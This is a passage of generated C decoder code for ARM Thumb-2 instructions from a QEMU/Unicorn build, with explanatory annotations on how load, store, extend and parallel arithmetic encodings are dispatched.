*/ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0001.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:403 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:404 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; } return false; case 0x2: /* 11111000 .010.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11111000 0010.... ........ ........ */ switch (insn & 0x00000900) { case 0x00000000: /* 11111000 0010.... ....0..0 ........ */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch (insn & 0x000006c0) { case 0x00000000: /* 11111000 0010.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:374 */ if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000800: /* 11111000 0010.... ....1..0 ........ */ switch ((insn >> 9) & 0x3) { case 0x2: /* 11111000 0010.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:376 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x3: /* 11111000 0010.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:377 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_STRHT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00000900: /* 11111000 0010.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:375 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 1010.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:378 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* 11111000 .011.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111000 .0111111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 .0111111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:409 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:410 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111000 1011.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 1011.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:413 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:414 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111000 0011.... ....1..1 ........ 
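   [annotation: the LDRH rows here mirror the LDRB group, with the
    Rt=1111 encodings again falling back to trans_NOP as hints]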
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:416 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111000 0011.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0011.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:418 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:419 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111000 0011.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:421 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRHT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111000 0011.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0011.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:423 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:424 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; } return false; case 0x4: /* 11111000 .100.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11111000 0100.... ........ ........ */ switch (insn & 0x00000900) { case 0x00000000: /* 11111000 0100.... ....0..0 ........ */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch (insn & 0x000006c0) { case 0x00000000: /* 11111000 0100.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:380 */ if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000800: /* 11111000 0100.... ....1..0 ........ */ switch ((insn >> 9) & 0x3) { case 0x2: /* 11111000 0100.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:382 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x3: /* 11111000 0100.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:383 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_STRT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00000900: /* 11111000 0100.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:381 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 1100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:384 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x5: /* 11111000 .101.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111000 .1011111 ........ ........ 
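   [annotation: word-sized LDR: Rn=1111 selects the PC-relative
    literal form; unlike the byte and halfword groups there is no NOP
    hint fallback, since a load into r15 is a valid branch]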
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:428 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111000 1101.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:429 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111000 0101.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:430 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111000 0101.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:431 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111000 0101.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:432 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111000 0101.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:433 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; } return false; } return false; case 0x1: /* 11111001 ........ ........ ........ */ switch ((insn >> 20) & 0x7) { case 0x1: /* 11111001 .001.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111001 .0011111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 .0011111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:438 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:439 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111001 1001.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 1001.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:442 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:443 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111001 0001.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:445 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111001 0001.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0001.... 11111100 ........ 
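   [annotation: signed-byte loads; the Rt=1111 NOP fallbacks here
    likely cover the PLI preload-instruction hints rather than PLD]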
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:447 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:448 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111001 0001.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:450 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRSBT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111001 0001.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0001.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:452 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:453 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; } return false; case 0x3: /* 11111001 .011.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111001 .0111111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 .0111111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:459 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:460 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111001 1011.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 1011.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:463 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:464 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111001 0011.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:466 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111001 0011.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0011.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:468 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:469 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111001 0011.... ....1110 ........ 
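   [annotation: signed-halfword loads mirror the signed-byte group;
    the Rt=1111 encodings are presumably unallocated hints, decoded
    as NOP]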
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:471 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRSHT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111001 0011.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0011.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:473 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:474 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; } return false; } return false; case 0x2: /* 11111010 ........ ........ ........ */ switch (insn & 0x0080f0c0) { case 0x0000f000: /* 11111010 0....... 1111.... 00...... */ disas_t32_extract_disas_t32_Fmt_4(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 4) & 0x3) { case 0x0: /* 11111010 0....... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:93 */ if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x0000f080: /* 11111010 0....... 1111.... 10...... */ disas_t32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); switch ((insn >> 20) & 0x7) { case 0x0: /* 11111010 0000.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:596 */ if (trans_SXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x1: /* 11111010 0001.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:597 */ if (trans_UXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x2: /* 11111010 0010.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:598 */ if (trans_SXTAB16(ctx, &u.f_rrr_rot)) return true; return false; case 0x3: /* 11111010 0011.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:599 */ if (trans_UXTAB16(ctx, &u.f_rrr_rot)) return true; return false; case 0x4: /* 11111010 0100.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:600 */ if (trans_SXTAB(ctx, &u.f_rrr_rot)) return true; return false; case 0x5: /* 11111010 0101.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:601 */ if (trans_UXTAB(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x0080f000: /* 11111010 1....... 1111.... 00...... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00700030) { case 0x00000000: /* 11111010 1000.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:550 */ if (trans_SADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000010: /* 11111010 1000.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:551 */ if (trans_QADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000020: /* 11111010 1000.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:552 */ if (trans_SHADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100000: /* 11111010 1001.... 1111.... 0000.... 
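   [annotation: parallel add/subtract: insn[22:20] picks the operation
    pair (ADD8, ADD16, ASX, SUB8, SUB16, SAX), insn[5:4] the flavor
    (basic, Q saturating, H halving), and bit 6 splits the signed
    table from the unsigned one that follows]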
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:557 */ if (trans_SADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100010: /* 11111010 1001.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:558 */ if (trans_QADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100020: /* 11111010 1001.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:559 */ if (trans_SHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00200000: /* 11111010 1010.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:564 */ if (trans_SASX(ctx, &u.f_rrr)) return true; return false; case 0x00200010: /* 11111010 1010.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:565 */ if (trans_QASX(ctx, &u.f_rrr)) return true; return false; case 0x00200020: /* 11111010 1010.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:566 */ if (trans_SHASX(ctx, &u.f_rrr)) return true; return false; case 0x00400000: /* 11111010 1100.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:571 */ if (trans_SSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400010: /* 11111010 1100.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:572 */ if (trans_QSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400020: /* 11111010 1100.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:573 */ if (trans_SHSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00500000: /* 11111010 1101.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:578 */ if (trans_SSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500010: /* 11111010 1101.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:579 */ if (trans_QSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500020: /* 11111010 1101.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:580 */ if (trans_SHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00600000: /* 11111010 1110.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:585 */ if (trans_SSAX(ctx, &u.f_rrr)) return true; return false; case 0x00600010: /* 11111010 1110.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:586 */ if (trans_QSAX(ctx, &u.f_rrr)) return true; return false; case 0x00600020: /* 11111010 1110.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:587 */ if (trans_SHSAX(ctx, &u.f_rrr)) return true; return false; } return false; case 0x0080f040: /* 11111010 1....... 1111.... 01...... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00700030) { case 0x00000000: /* 11111010 1000.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:553 */ if (trans_UADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000010: /* 11111010 1000.... 1111.... 
0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:554 */ if (trans_UQADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000020: /* 11111010 1000.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:555 */ if (trans_UHADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100000: /* 11111010 1001.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:560 */ if (trans_UADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100010: /* 11111010 1001.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:561 */ if (trans_UQADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100020: /* 11111010 1001.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:562 */ if (trans_UHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00200000: /* 11111010 1010.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:567 */ if (trans_UASX(ctx, &u.f_rrr)) return true; return false; case 0x00200010: /* 11111010 1010.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:568 */ if (trans_UQASX(ctx, &u.f_rrr)) return true; return false; case 0x00200020: /* 11111010 1010.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:569 */ if (trans_UHASX(ctx, &u.f_rrr)) return true; return false; case 0x00400000: /* 11111010 1100.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:574 */ if (trans_USUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400010: /* 11111010 1100.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:575 */ if (trans_UQSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400020: /* 11111010 1100.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:576 */ if (trans_UHSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00500000: /* 11111010 1101.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:581 */ if (trans_USUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500010: /* 11111010 1101.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:582 */ if (trans_UQSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500020: /* 11111010 1101.... 1111.... 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:583 */ if (trans_UHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00600000: /* 11111010 1110.... 1111.... 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:588 */ if (trans_USAX(ctx, &u.f_rrr)) return true; return false; case 0x00600010: /* 11111010 1110.... 1111.... 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:589 */ if (trans_UQSAX(ctx, &u.f_rrr)) return true; return false; case 0x00600020: /* 11111010 1110.... 1111.... 0110.... 
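   [annotation: the 10...... column next holds the miscellaneous
    register ops: QADD/QSUB/QDADD/QDSUB, the REV/REV16/RBIT/REVSH
    bit and byte reversals, SEL, CLZ and the CRC32 checksums]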
